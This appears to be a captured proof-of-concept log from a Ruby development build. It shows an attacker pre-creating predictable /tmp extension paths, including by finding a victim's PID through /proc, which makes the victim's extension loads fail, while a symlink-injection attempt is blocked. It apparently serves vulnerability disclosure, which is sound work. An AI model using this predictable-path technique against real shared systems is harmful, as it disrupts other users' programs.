Ruby

### Captured Sat Jun 13 05:59:13 AM +03 2026 on ruby 4.1.0dev @533abc7ded (ASAN build)

## PoC-1 CONTROL (no pre-create)

mode=control box_id=4 pid=172214

predicted_path=/tmp/_ruby_box_p172214_4_fcntl.so

path_pre_created=false

RESULT=SUCCESS (require=true)

## PoC-1 ATTACK (pre-create predicted path)

mode=attack box_id=4 pid=172217

predicted_path=/tmp/_ruby_box_p172217_4_fcntl.so

path_pre_created=true

RESULT=LoadError: can't prepare the extension file for Ruby Box (/tmp/_ruby_box_p172217_4_fcntl.so from /home/kali/ruby/.ext/x86_64-linux/fcntl.so): can't open the file to write

## PoC-2 ATTACK (separate attacker, /proc PID discovery)

attacker: discovered victim PID via /proc = 172225

attacker: pre-creating predictable paths for PID=172225, box_id in {1 2 3 4 5 6 7 8}, ext=fcntl.so

victim info : 172225 4 boxpoc_172220_1781319553

victim result: LoadError: can't prepare the extension file for Ruby Box (/tmp/_ruby_box_p172225_4_fcntl.so from /home/kali/ruby/.ext/x86_64-linux/fcntl.so): can't open the file to write

## Symlink-injection attempt (expect LoadError = no injection)

LoadError (O_EXCL rejected symlink; NO injection)